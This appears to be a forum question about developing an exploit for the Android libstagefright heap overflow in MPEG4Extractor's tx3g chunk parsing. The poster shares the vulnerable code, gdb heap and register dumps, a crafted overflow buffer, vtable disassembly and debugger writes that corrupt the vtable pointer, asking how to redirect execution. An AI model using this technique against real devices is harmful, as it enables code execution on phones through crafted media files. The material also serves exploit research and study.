Vtable: finding the vtable pointer

    // overflow here, so that size + chunk_size == 32 and size > 32
    uint8_t *buffer = new uint8_t[size + chunk_size];
    // buffer is allocated immediately before mDataSource
    if (size > 0) {
        // this will overflow and corrupt the mDataSource vtable
        memcpy(buffer, data, size);
    }
    // this call goes through the corrupt vtable, and we get control of execution
    if ((size_t)(mDataSource->readAt(*offset, buffer + size, chunk_size))
            < chunk_size) {

I set breakpoints before and after memcpy() and was hoping to see the address of the readAt() function in the vtable, but somehow it isn't there.

How can I find it?

The address of the readAt() function is

(gdb) b android::MPEG4DataSource::readAt
Breakpoint 3 at 0xb6704b68

memcpy call:

   0xb670a5c6 <+6702>:  ldr r1, [sp, #96]   ; 0x60
   0xb670a5c8 <+6704>:  blx 0xb66e3f84 <memcpy@plt>
   0xb670a5cc <+6708>:  ldr r0, [r6, #80]   ; 0x50

registers

(gdb) i r
r0             0xb7499ab8   3075054264
r1             0xb749b800   3075061760
r2             0x7d 125
r3             0xffffffff   4294967295
r4             0x7d 125
r5             0x0  0
r6             0xb749a250   3075056208
r7             0xb4e83540   3035116864
r8             0xb7499ab8   3075054264
r9             0xb4e83a68   3035118184
r10            0x5c 92
r11            0x1  1
r12            0x1  1
sp             0xb4e834d0   0xb4e834d0
lr             0xb6f14a43   -1225700797
pc             0xb670a5c8   0xb670a5c8 <android::MPEG4Extractor::parseChunk(long long*, int)+6704>
cpsr           0xa0070030   -1610153936

buffer dump (it is at the address in R0)

(gdb) x/20000x 0xb7499ab8
0xb7499ab8: 0xb6f45130  0xb6f45130  0x41414141  0x41414141
0xb7499ac8: 0x41414141  0x41414141  0x41414141  0x41414141
0xb7499ad8: 0x00000000  0x00000000  0x00000030  0x00000023
0xb7499ae8: 0x00000001  0x00000001  0xb749ab10  0x00000000
0xb7499af8: 0x74732d74  0x6d616572  0x00000020  0x00000033
0xb7499b08: 0xb67beee8  0xb7499b38  0xb7499b50  0x00000000
0xb7499b18: 0xb7495860  0x00000000  0x0000001c  0x00000000
0xb7499b28: 0x0100024c  0xb1cb3008  0x00000000  0x0000001b
0xb7499b38: 0x00000001  0x00000001  0xb7499b08  0x00000000
0xb7499b48: 0x00000000  0x0000002b  0xb67be688  0xb7499b78
0xb7499b58: 0x00000000  0xb67be678  0xb7499b90  0xb67be678
0xb7499b68: 0xb7499ba0  0x00000000  0x00000000  0x0000001b
0xb7499b78: 0x00000001  0x00000001  0xb7499b50  0x00000000
0xb7499b88: 0x00000000  0x00000013  0x00000000  0xb7499c60
0xb7499b98: 0xb7499bb0  0x00000013  0x00000720  0xb7499c70
0xb7499ba8: 0xb7499c70  0x00000013  0xb6705e65  0xb7499b90
0xb7499bb8: 0xb7499bc0  0x00000013  0xb674d971  0xb7499bb0
0xb7499bc8: 0xb7499bd0  0x00000013  0xb672ac11  0xb7499bc0
0xb7499bd8: 0xb7499be0  0x00000013  0xb6732a79  0xb7499bd0
0xb7499be8: 0xb7499bf0  0x00000013  0xb670090d  0xb7499be0
0xb7499bf8: 0xb7499c00  0x00000013  0xb66f1d61  0xb7499bf0
0xb7499c08: 0xb7499c10  0x00000013  0xb675f3b5  0xb7499c00
0xb7499c18: 0xb7499c20  0x00000013  0xb6701dad  0xb7499c10
0xb7499c28: 0xb7499c30  0x00000013  0xb66f0b91  0xb7499c20
0xb7499c38: 0xb7499c40  0x00000013  0xb675dbdd  0xb7499c30
0xb7499c48: 0xb7499c50  0x00000013  0xb6733999  0xb7499c40
0xb7499c58: 0xb7499c60  0x00000013  0xb6734f85  0xb7499c50
0xb7499c68: 0xb7499b90  0x00000013  0xb50c50d5  0xb7499ba0
0xb7499c78: 0xb7499ba0  0x0000002b  0x4c4c4c4c  0x4c4c4c4c
0xb7499c88: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499c98: 0x4c4c4c4c  0x4c4c4c4c  0x00000008  0x0000002b
0xb7499ca8: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499cb8: 0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c  0x4c4c4c4c
0xb7499cc8: 0x2f6e6f69  0x0000001b  0x00000002  0x00000002
0xb7499cd8: 0xb749bad8  0x00000000  0x00000018  0x00000023
0xb7499ce8: 0x000011c7  0x00000000  0x00010000  0x00000000
0xb7499cf8: 0xb7499808  0xb74969e8  0x00000020  0x00000013
0xb7499d08: 0xb7499838  0xb7499828  0xb7499d40  0x0000001b
0xb7499d18: 0xb3107008  0x00010000  0xb749b330  0x00000000
0xb7499d28: 0x00000018  0x00000013  0xb3118008  0x00010000
0xb7499d38: 0x007cf93a  0x00000013  0xb7499d30  0xb7499d08
0xb7499d48: 0xb7499d88  0x0000001b  0xb30f6008  0x00010000
0xb7499d58: 0xb749a2f0  0x00000000  0x00000018  0x00000023
0xb7499d68: 0x0000116a  0x00000000  0x00010000  0x00000000
0xb7499d78: 0xb74969e8  0xb7499d98  0x00000020  0x00000013
0xb7499d88: 0xb7499d18  0xb7499d40  0xb7499db8  0x00000023
0xb7499d98: 0x00001366  0x00000000  0x00010000  0x00000000
0xb7499da8: 0xb7499d68  0xb7496a40  0x00000020  0x00000013
0xb7499db8: 0xb7499d50  0xb7499d88  0xb7499dd8  0x00000013
0xb7499dc8: 0xb30e5008  0x00010000  0xb749a2f0  0x00000013
0xb7499dd8: 0xb7499dc8  0xb7499db8  0xb7499e10  0x0000001b
0xb7499de8: 0xb30c3008  0x00010000  0xb749b330  0x00000000
0xb7499df8: 0x00000018  0x00000013  0xb30d4008  0x00010000
0xb7499e08: 0x00540048  0x00000013  0xb7499e00  0xb7499dd8
0xb7499e18: 0xb7499e20  0x00000013  0xb7499de8  0xb7499e10
0xb7499e28: 0xb7499e58  0x0000001b  0xb30a1008  0x00010000
0xb7499e38: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb7499e48: 0xb30b2008  0x00010000  0x00540048  0x00000013
0xb7499e58: 0xb7499e48  0xb7499e20  0xb7499e68  0x00000013
0xb7499e68: 0xb7499e30  0xb7499e58  0xb7499e88  0x00000013
0xb7499e78: 0xb3090008  0x00010000  0x0065006d  0x00000013
0xb7499e88: 0xb7499e78  0xb7499e68  0xb7499ea8  0x00000013
0xb7499e98: 0xb307f008  0x00010000  0x0065006d  0x00000013
0xb7499ea8: 0xb7499e98  0xb7499e88  0xb7499ec8  0x00000013
0xb7499eb8: 0xb306e008  0x00010000  0x0065006d  0x00000013
0xb7499ec8: 0xb7499eb8  0xb7499ea8  0xb7499ee8  0x00000013
0xb7499ed8: 0xb1ca2008  0x00010000  0x0065006d  0x00000013
0xb7499ee8: 0xb7499ed8  0xb7499ec8  0xb7499f08  0x00000013
0xb7499ef8: 0xb1c91008  0x00010000  0x0065006d  0x00000013
0xb7499f08: 0xb7499ef8  0xb7499ee8  0xb7499f28  0x00000013
0xb7499f18: 0xb1c80008  0x00010000  0x0065006d  0x00000013
0xb7499f28: 0xb7499f18  0xb7499f08  0xb7499f48  0x00000013
0xb7499f38: 0xb1c6f008  0x00010000  0x0065006d  0x00000013
0xb7499f48: 0xb7499f38  0xb7499f28  0xb7499f68  0x00000013
0xb7499f58: 0xb1c5e008  0x00010000  0x0065006d  0x00000013
0xb7499f68: 0xb7499f58  0xb7499f48  0xb7499f88  0x00000013
0xb7499f78: 0xb1c4d008  0x00010000  0x0065006d  0x00000013
0xb7499f88: 0xb7499f78  0xb7499f68  0xb7499fa8  0x00000013
0xb7499f98: 0xb1c3c008  0x00010000  0x0065006d  0x00000013
0xb7499fa8: 0xb7499f98  0xb7499f88  0xb7499fc8  0x00000013
0xb7499fb8: 0xb1c2b008  0x00010000  0x0065006d  0x00000013
0xb7499fc8: 0xb7499fb8  0xb7499fa8  0xb7499fe8  0x00000013
0xb7499fd8: 0xb1c1a008  0x00010000  0x0065006d  0x00000013
0xb7499fe8: 0xb7499fd8  0xb7499fc8  0xb749a008  0x00000013
0xb7499ff8: 0xb1c09008  0x00010000  0x0065006d  0x00000013
0xb749a008: 0xb7499ff8  0xb7499fe8  0xb749a028  0x00000013
0xb749a018: 0xb1bf8008  0x00010000  0x0065006d  0x00000013
0xb749a028: 0xb749a018  0xb749a008  0xb749a048  0x00000013
0xb749a038: 0xb1be7008  0x00010000  0x0065006d  0x00000013
0xb749a048: 0xb749a038  0xb749a028  0xb749a068  0x00000013
0xb749a058: 0xb1bd6008  0x00010000  0x0065006d  0x00000013
0xb749a068: 0xb749a058  0xb749a048  0xb749a088  0x00000013
0xb749a078: 0xb1bc5008  0x00010000  0x0065006d  0x00000013
0xb749a088: 0xb749a078  0xb749a068  0xb749a0a8  0x00000013
0xb749a098: 0xb1bb4008  0x00010000  0x0065006d  0x00000013
0xb749a0a8: 0xb749a098  0xb749a088  0xb749a0e0  0x0000001b
0xb749a0b8: 0xb1b92008  0x00010000  0xb749b330  0x00000000
0xb749a0c8: 0x00000018  0x00000013  0xb1ba3008  0x00010000
0xb749a0d8: 0x00540048  0x00000013  0xb749a0d0  0xb749a0a8
0xb749a0e8: 0xb749a0f0  0x00000013  0xb749a0b8  0xb749a0e0
0xb749a0f8: 0xb749a128  0x0000001b  0xb1b70008  0x00010000
0xb749a108: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a118: 0xb1b81008  0x00010000  0x00540048  0x00000013
0xb749a128: 0xb749a118  0xb749a0f0  0xb749a138  0x00000013
0xb749a138: 0xb749a100  0xb749a128  0xb749a158  0x00000013
0xb749a148: 0xb1b5f008  0x00010000  0x0065006d  0x00000013
0xb749a158: 0xb749a148  0xb749a138  0xb749a178  0x00000013
0xb749a168: 0xb1b4e008  0x00010000  0x0065006d  0x00000013
0xb749a178: 0xb749a168  0xb749a158  0xb749a1b0  0x0000001b
0xb749a188: 0xb1b2c008  0x00010000  0xb749b330  0x00000000
0xb749a198: 0x00000018  0x00000013  0xb1b3d008  0x00010000
0xb749a1a8: 0x00540048  0x00000013  0xb749a1a0  0xb749a178
0xb749a1b8: 0xb749a1d8  0x0000001b  0xb1b1b008  0x00010000
0xb749a1c8: 0xb749a2f0  0x00000000  0x00000018  0x00000013
0xb749a1d8: 0xb749a188  0xb749a1b0  0xb749a1e8  0x00000013
0xb749a1e8: 0xb749a1c0  0xb749a1d8  0xb749a220  0x0000001b
0xb749a1f8: 0xb1af9008  0x00010000  0xb749a2f0  0x00000000
0xb749a208: 0x00000018  0x00000013  0xb1b0a008  0x00010000
0xb749a218: 0x00000000  0x00000013  0xb749a210  0xb749a1e8
0xb749a228: 0xb749a230  0x00000013  0xb749a1f8  0xb749a220
0xb749a238: 0xb7495ed0  0x00000013  0xb1ae8008  0x00010000
0xb749a248: 0x00000010  0x000000a3  0xb67bedc8  0xb74998c0
0xb749a258: 0x66657400  0xb67bed28  0x00000000  0x00000000
0xb749a268: 0x00000000  0x00000008  0x00000000  0x00000000
0xb749a278: 0xb67bed50  0xb749bbc8  0x0000001c  0x00000000
0xb749a288: 0x00000018  0xb67bed78  0x00000000  0x00000000
0xb749a298: 0x00000000  0x00000014  0xb749bad8  0xffffffed
0xb749a2a8: 0x00000000  0x00000000  0xb7499a40  0xb7499a40
0xb749a2b8: 0xb74998d8  0xb67bcb60  0xb74998a8  0x00000003
0xb749a2c8: 0x00000007  0x00000004  0xb7429680  0xb7429680
0xb749a2d8: 0xb7429680  0x00000000  0x00000000  0x00000000
0xb749a2e8: 0x00000000  0x00000013  0xb748d820  0xb748d810
0xb749a2f8: 0xb749a310  0x00000013  0xb1a1c008  0x00010000
0xb749a308: 0xb749bb50  0x00000013  0xb749a300  0xb749a2f0
0xb749a318: 0xb749a330  0x00000013  0xb1a0b008  0x00010000
0xb749a328: 0xb749b330  0x00000013  0xb749a320  0xb749a310
0xb749a338: 0xb749a350  0x00000013  0xb19fa008  0x00010000
0xb749a348: 0xb749bb50  0x00000013  0xb749a340  0xb749a330
0xb749a358: 0xb749a370  0x00000013  0xb19e9008  0x00010000
0xb749a368: 0xb749b330  0x00000013  0xb749a360  0xb749a350
0xb749a378: 0xb749a3a8  0x0000001b  0xb19c7008  0x00010000
0xb749a388: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a398: 0xb19d8008  0x00010000  0x00540048  0x00000013
0xb749a3a8: 0xb749a398  0xb749a370  0xb749a3b8  0x00000013
0xb749a3b8: 0xb749a380  0xb749a3a8  0xb749a3d8  0x00000013
0xb749a3c8: 0xb19b6008  0x00010000  0xb749bb50  0x00000013
0xb749a3d8: 0xb749a3c8  0xb749a3b8  0xb749a3f8  0x00000013
0xb749a3e8: 0xb19a5008  0x00010000  0xb749b330  0x00000013
0xb749a3f8: 0xb749a3e8  0xb749a3d8  0xb749a418  0x00000013
0xb749a408: 0xb1994008  0x00010000  0xb749bb50  0x00000013
0xb749a418: 0xb749a408  0xb749a3f8  0xb749a438  0x00000013
0xb749a428: 0xb1983008  0x00010000  0xb749b330  0x00000013
0xb749a438: 0xb749a428  0xb749a418  0xb749a470  0x0000001b
0xb749a448: 0xb1961008  0x00010000  0xb749bb50  0x00000000
0xb749a458: 0x00000018  0x00000013  0xb1972008  0x00010000
0xb749a468: 0x00540048  0x00000013  0xb749a460  0xb749a438
0xb749a478: 0xb749a480  0x00000013  0xb749a448  0xb749a470
0xb749a488: 0xb749a4a0  0x00000013  0xb1950008  0x00010000
0xb749a498: 0xb749bb50  0x00000013  0xb749a490  0xb749a480
0xb749a4a8: 0xb749a4c0  0x00000013  0xb193f008  0x00010000
0xb749a4b8: 0xb749b330  0x00000013  0xb749a4b0  0xb749a4a0
0xb749a4c8: 0xb749a4e0  0x00000013  0xb192e008  0x00010000
0xb749a4d8: 0xb749bb50  0x00000013  0xb749a4d0  0xb749a4c0
0xb749a4e8: 0xb749a500  0x00000013  0xb191d008  0x00010000
0xb749a4f8: 0xb749b330  0x00000013  0xb749a4f0  0xb749a4e0
0xb749a508: 0xb749a538  0x0000001b  0xb18fb008  0x00010000
0xb749a518: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a528: 0xb190c008  0x00010000  0x00540048  0x00000013
0xb749a538: 0xb749a528  0xb749a500  0xb749a548  0x00000013
0xb749a548: 0xb749a510  0xb749a538  0xb749a568  0x00000013
0xb749a558: 0xb18ea008  0x00010000  0xb749bb50  0x00000013
0xb749a568: 0xb749a558  0xb749a548  0xb749a588  0x00000013
0xb749a578: 0xb18d9008  0x00010000  0xb749b330  0x00000013
0xb749a588: 0xb749a578  0xb749a568  0xb749a5c0  0x0000001b
0xb749a598: 0xb18b7008  0x00010000  0xb749bb50  0x00000000
0xb749a5a8: 0x00000018  0x00000013  0xb18c8008  0x00010000
0xb749a5b8: 0x00540048  0x00000013  0xb749a5b0  0xb749a588
0xb749a5c8: 0xb749a5d0  0x00000013  0xb749a598  0xb749a5c0
0xb749a5d8: 0xb749a608  0x0000001b  0xb1895008  0x00010000
0xb749a5e8: 0xb749bb50  0x00000000  0x00000018  0x00000013
0xb749a5f8: 0xb18a6008  0x00010000  0x00540048  0x00000013
0xb749a608: 0xb749a5f8  0xb749a5d0  0xb749a618  0x00000013
0xb749a618: 0xb749a5e0  0xb749a608  0xb749a638  0x00000013
0xb749a628: 0xb1884008  0x00010000  0xb749bb50  0x00000013
0xb749a638: 0xb749a628  0xb749a618  0xb749a658  0x00000013
0xb749a648: 0xb1873008  0x00010000  0xb749b330  0x00000013
0xb749a658: 0xb749a648  0xb749a638  0xb749a678  0x00000013
0xb749a668: 0xb1862008  0x00010000  0xb749bb50  0x00000013
0xb749a678: 0xb749a668  0xb749a658  0xb749a698  0x00000013
0xb749a688: 0xb1851008  0x00010000  0xb749b330  0x00000013
0xb749a698: 0xb749a688  0xb749a678  0xb749a6b8  0x00000013
0xb749a6a8: 0xb1840008  0x00010000  0xb749bb50  0x00000013
0xb749a6b8: 0xb749a6a8  0xb749a698  0xb749a6d8  0x00000013
0xb749a6c8: 0xb182f008  0x00010000  0xb749b330  0x00000013
0xb749a6d8: 0xb749a6c8  0xb749a6b8  0xb749a6f8  0x00000013
0xb749a6e8: 0xb181e008  0x00010000  0xb749bb50  0x00000013
0xb749a6f8: 0xb749a6e8  0xb749a6d8  0xb749a718  0x00000013
0xb749a708: 0xb180d008  0x00010000  0xb749b330  0x00000013
0xb749a718: 0xb749a708  0xb749a6f8  0xb749a750  0x0000001b
0xb749a728: 0xb17eb008  0x00010000  0xb749bb50  0x00000000
0xb749a738: 0x00000018  0x00000013  0xb17fc008  0x00010000
0xb749a748: 0x00540048  0x00000013  0xb749a740  0xb749a718
0xb749a758: 0xb749a778  0x0000001b  0xb17da008  0x00010000
0xb749a768: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a778: 0xb749a728  0xb749a750  0xb749a788  0x00000013
0xb749a788: 0xb749a760  0xb749a778  0xb749a7c0  0x0000001b
0xb749a798: 0xb17b8008  0x00010000  0xb749b330  0x00000000
0xb749a7a8: 0x00000018  0x00000013  0xb17c9008  0x00010000
0xb749a7b8: 0x00540048  0x00000013  0xb749a7b0  0xb749a788
0xb749a7c8: 0xb749a7d0  0x00000013  0xb749a798  0xb749a7c0
0xb749a7d8: 0xb749a7f0  0x00000013  0xb17a7008  0x00010000
0xb749a7e8: 0xb749b330  0x00000013  0xb749a7e0  0xb749a7d0
0xb749a7f8: 0xb749a810  0x00000013  0xb1796008  0x00010000
0xb749a808: 0xb749bb50  0x00000013  0xb749a800  0xb749a7f0
0xb749a818: 0xb749a848  0x0000001b  0xb1774008  0x00010000
0xb749a828: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a838: 0xb1785008  0x00010000  0x00540048  0x00000013
0xb749a848: 0xb749a838  0xb749a810  0xb749a858  0x00000013
0xb749a858: 0xb749a820  0xb749a848  0xb749a878  0x00000013
0xb749a868: 0xb1763008  0x00010000  0xb749b330  0x00000013
0xb749a878: 0xb749a868  0xb749a858  0xb749a898  0x00000013
0xb749a888: 0xb1752008  0x00010000  0xb749bb50  0x00000013
0xb749a898: 0xb749a888  0xb749a878  0xb749a8b8  0x00000013
0xb749a8a8: 0xb1741008  0x00010000  0xb749b330  0x00000013
0xb749a8b8: 0xb749a8a8  0xb749a898  0xb749a8d8  0x00000013
0xb749a8c8: 0xb1730008  0x00010000  0xb749bb50  0x00000013
0xb749a8d8: 0xb749a8c8  0xb749a8b8  0xb749a8f8  0x00000013
0xb749a8e8: 0xb171f008  0x00010000  0xb749b330  0x00000013
0xb749a8f8: 0xb749a8e8  0xb749a8d8  0xb749a930  0x0000001b
0xb749a908: 0xb16fd008  0x00010000  0xb749bb50  0x00000000
0xb749a918: 0x00000018  0x00000013  0xb170e008  0x00010000
0xb749a928: 0x00540048  0x00000013  0xb749a920  0xb749a8f8
0xb749a938: 0xb749a958  0x0000001b  0xb16ec008  0x00010000
0xb749a948: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a958: 0xb749a908  0xb749a930  0xb749a980  0x0000001b
0xb749a968: 0xb16db008  0x00010000  0xb749bb50  0x00000000
0xb749a978: 0x00000018  0x00000013  0xb749a940  0xb749a958
0xb749a988: 0xb749a9a8  0x0000001b  0xb16ca008  0x00010000
0xb749a998: 0xb749b330  0x00000000  0x00000018  0x00000013
0xb749a9a8: 0xb749a968  0xb749a980  0xb749a9b8  0x00000013
0xb749a9b8: 0xb749a990  0xb749a9a8  0xb749a9d8  0x00000013
0xb749a9c8: 0xb16b9008  0x00010000  0xb749b330  0x00000013
0xb749a9d8: 0xb749a9c8  0xb749a9b8  0xb749a9f8  0x00000013
0xb749a9e8: 0xb16a8008  0x00010000  0xb749bb50  0x00000013
0xb749a9f8: 0xb749a9e8  0xb749a9d8  0xb749aa18  0x00000013
0xb749aa08: 0xb1697008  0x00010000  0xb749b330  0x00000013
0xb749aa18: 0xb749aa08  0xb749a9f8  0xb749aa38  0x00000013
0xb749aa28: 0xb1686008  0x00010000  0xb749bb50  0x00000013
0xb749aa38: 0xb749aa28  0xb749aa18  0xb749aa58  0x00000013
0xb749aa48: 0xb1675008  0x00010000  0xb749b330  0x00000013
0xb749aa58: 0xb749aa48  0xb749aa38  0xb749aa78  0x00000013
0xb749aa68: 0xb1664008  0x00010000  0xb749bb50  0x00000013
0xb749aa78: 0xb749aa68  0xb749aa58  0xb749aab0  0x0000001b
0xb749aa88: 0xb1642008  0x00010000  0xb749b330  0x00000000
0xb749aa98: 0x00000018  0x00000013  0xb1653008  0x00010000
0xb749aaa8: 0x00540048  0x00000013  0xb749aaa0  0xb749aa78
0xb749aab8: 0xb749b330  0x00000023  0x00001464  0x00000000
0xb749aac8: 0x00010000  0x00000000  0xb749b398  0xb749aaf0
0xb749aad8: 0xb6f45138  0x00000013  0xb15dc008  0x00010000
0xb749aae8: 0xb749bbe8  0x00000023  0x0000149b  0x00000000
0xb749aaf8: 0x00010000  0x00000011  0xb749aac0  0xb7495e58
0xb749ab08: 0x00000020  0x00000823  0xb68eb970  0xb7499ae8
0xb749ab18: 0x66657463  0x00000001  0xb6f45220  0x00000006
0xb749ab28: 0x00000000  0x00000000  0x00000000  0x00000006
0xb749ab38: 0x00000001  0x00000000  0xb1cb3008  0x00000000
0xb749ab48: 0x00000000  0x00000000  0x00000000  0x00000004
0xb749ab58: 0x00000005  0x00000000  0x0100024c  0x00000000
0xb749ab68: 0x00000000  0x00000000  0x00000000  0x00000004
0xb749ab78: 0x00000002  0x00000000  0x00000000  0x00000000
0xb749ab88: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ab98: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749aba8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abb8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abc8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abd8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abe8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749abf8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac08: 0x00000000  0x000083d1  0x00000000  0x00000000
0xb749ac18: 0x00008f00  0x0000800a  0x00000000  0x00000000
0xb749ac28: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac38: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac48: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac58: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac68: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac78: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac88: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ac98: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749aca8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acb8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acc8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acd8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ace8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749acf8: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad08: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad18: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad28: 0x00000000  0x000082b1  0x00000000  0x00000000
0xb749ad38: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad48: 0x00000000  0x00000000  0x00000000  0x00000000
0xb749ad58: 0x00000000  0x00000000  0x00000000  0x00000000

How can I find the readAt() pointer that I want to overwrite?

Is there a way to see which addresses in the 0xb7499ab8 range will be accessed later?

The platform is ARM (Android, CyanogenMod)

Thanks,

Update 1:

Modified the source to print the address of the buffer and of mDataSource

V/MPEG4Extractor( 5106): chunk: tx3g @ 16777864, 1
V/MPEG4Extractor( 5106): buffer addy = 0xb72f6cd0
V/MPEG4Extractor( 5106): mDataSource addy = 0xb72f4ea0

For the buffer my understanding was correct, but for mDataSource I don't know.

After the call to memcpy()

(gdb) x/20x 0xb72f6cd0
0xb72f6cd0: 0x7d000000  0x67337874  0x41414141  0x41414141
0xb72f6ce0: 0x41414141  0x41414141  0x41414141  0x41414141
0xb72f6cf0: 0x99999999  0x88888888  0x42424242  0x42424242
0xb72f6d00: 0x42424242  0x42424242  0x42424242  0x42424242
0xb72f6d10: 0x42424242  0x42424242  0x42424242  0x42424242

0x99999999 should overwrite the mDataSource vtable pointer, but that is clearly wrong in the exploit, since mDataSource is at 0xb72f4ea0 and this is what it contains:

(gdb) x/20 0xb72f4ea0
0xb72f4ea0: 0xb72f5120  0xffffffed  0x00000000  0x00000000
0xb72f4eb0: 0xb72f3a38  0xb72f3a38  0xb72f4ef0  0xb67c5b60
0xb72f4ec0: 0xb72f4ff8  0x00000001  0x00000007  0x00000004
0xb72f4ed0: 0xb7289680  0xb7289680  0xb7289680  0x00000000
0xb72f4ee0: 0x00000000  0x00000000  0x00000000  0x00000023

(gdb) x/60 0xb72f4ea0-64
0xb72f4e60: 0x00000000  0x00000000  0x00000000  0x00000008
0xb72f4e70: 0x00000000  0x00000000  0xb67c7d50  0xb72f6fc8
0xb72f4e80: 0x00000010  0x00000000  0x00000018  0xb67c7d78
0xb72f4e90: 0x00000000  0x00000000  0x00000000  0x00000014
0xb72f4ea0: 0xb72f5120  0xffffffed  0x00000000  0x00000000
0xb72f4eb0: 0xb72f3a38  0xb72f3a38  0xb72f4ef0  0xb67c5b60
0xb72f4ec0: 0xb72f4ff8  0x00000001  0x00000007  0x00000004
0xb72f4ed0: 0xb7289680  0xb7289680  0xb7289680  0x00000000
0xb72f4ee0: 0x00000000  0x00000000  0x00000000  0x00000023
0xb72f4ef0: 0xb67c8cb8  0xb72f4f10  0xb67c8c88  0x00000000
0xb72f4f00: 0x00000000  0x00000000  0x00000010  0x0000001b
0xb72f4f10: 0x00000001  0x00000001  0xb72f4ef0  0x00000000
0xb72f4f20: 0x00000000  0x00000023  0x00001318  0x00000000
0xb72f4f30: 0x00010000  0x00000000  0xb72f38a0  0xb72f38d0
0xb72f4f40: 0x00000020  0x00000013  0xb72f4d50  0xb72f4d40

How can I overwrite mDataSource to gain control of execution?

Update 2:

aha .... mDataSource is a pointer to a pointer, so trying this:

Android debug output:

V/MPEG4Extractor( 5570): chunk: avcC @ 16777832, 1
V/MPEG4Extractor( 5570): entering parseChunk 16777848/1
V/MPEG4Extractor( 5570): chunk: hvcC @ 16777848, 1
V/MPEG4Extractor( 5570): entering parseChunk 16777864/1
V/MPEG4Extractor( 5570): chunk: tx3g @ 16777864, 1
V/MPEG4Extractor( 5570): buffer addy = 0xb87a22d8
V/MPEG4Extractor( 5570): mDataSource addy = 0xb87a1488

(gdb) x/10x 0xb87a1488
0xb87a1488: 0xb87a1928  0xffffffed  0x00000000  0x00000000
0xb87a1498: 0xb879f170  0xb879f170  0xb87a14d8  0xb6795b60
0xb87a14a8: 0xb87a1600  0x00000001
(gdb) x/10x 0xb87a1928
0xb87a1928: 0xb6797ee8  0xb879f2d8  0xb87a1958  0x00000000
0xb87a1938: 0xb879ea60  0x00690064  0x0000001c  0x00000000
0xb87a1948: 0x0100024c  0xb1e24008

(gdb) disass 0xb6797ee8
Dump of assembler code for function _ZTVN7android15MPEG4DataSourceE:
   0xb6797ee0 <+0>: andeq   r0, r0, r0
   0xb6797ee4 <+4>: andeq   r0, r0, r0
   0xb6797ee8 <+8>:         ; <UNDEFINED> instruction: 0xb66dde5d
   0xb6797eec <+12>:            ; <UNDEFINED> instruction: 0xb66dde99
   0xb6797ef0 <+16>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797ef4 <+20>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797ef8 <+24>:            ; <UNDEFINED> instruction: 0xb6cbc513
   0xb6797efc <+28>:            ; <UNDEFINED> instruction: 0xb6cbc21f
   0xb6797f00 <+32>:            ; <UNDEFINED> instruction: 0xb66d70fd
   0xb6797f04 <+36>:            ; <UNDEFINED> instruction: 0xb66dcb1d
   0xb6797f08 <+40>:            ; <UNDEFINED> instruction: 0xb66dc4b7
   0xb6797f0c <+44>:    strbtlt r12, [sp], -r3, asr #9
   0xb6797f10 <+48>:            ; <UNDEFINED> instruction: 0xb66c8955
   0xb6797f14 <+52>:    strbtlt r6, [sp], -r5, ror #9
   0xb6797f18 <+56>:            ; <UNDEFINED> instruction: 0xb66bdc73
   0xb6797f1c <+60>:    strbtlt r6, [sp], -r5, lsr #8
   0xb6797f20 <+64>:            ; <UNDEFINED> instruction: 0xb66d6431
End of assembler dump.

So I tried to set:

0xb87a1928 to 0x11111111

(gdb) set *((int *) 0xb87a1928) = 0x11111111
(gdb) x/30x 0xb87a1928
0xb87a1928: 0x11111111  0xb879f2d8  0xb87a1958  0x00000000
0xb87a1938: 0xb879ea60  0x00690064  0x0000001c  0x00000000

Continue

Thread 12 "Binder_2" received signal SIGSEGV, Segmentation fault.
0xb66e1042 in android::MPEG4Extractor::parseChunk(long long*, int) () from /system/lib/libstagefright.so
(gdb) i r
pc             0xb66e1042   0xb66e1042 <android::MPEG4Extractor::parseChunk(long long*, int)+74>

I was hoping to see it in the PC register ....

(gdb) disass 0xb66e1042
Dump of assembler code for function _ZN7android14MPEG4Extractor10parseChunkEPxi:
   0xb66e0ff8 <+0>: stmdb   sp!, {r4, r5, r6, r7, r8, r9, r10, r11, lr}
   0xb66e0ffc <+4>: vpush   {d8}
   0xb66e1000 <+8>: mov r6, r0
   0xb66e1002 <+10>:    ldr.w   r8, [pc, #708]  ; 0xb66e12c8 <_ZN7android14MPEG4Extractor10parseChunkEPxi+720>
   0xb66e1006 <+14>:    mov r9, r1
   0xb66e1008 <+16>:    ldr r3, [pc, #704]  ; (0xb66e12cc <_ZN7android14MPEG4Extractor10parseChunkEPxi+724>)
   0xb66e100a <+18>:    sub sp, #444    ; 0x1bc
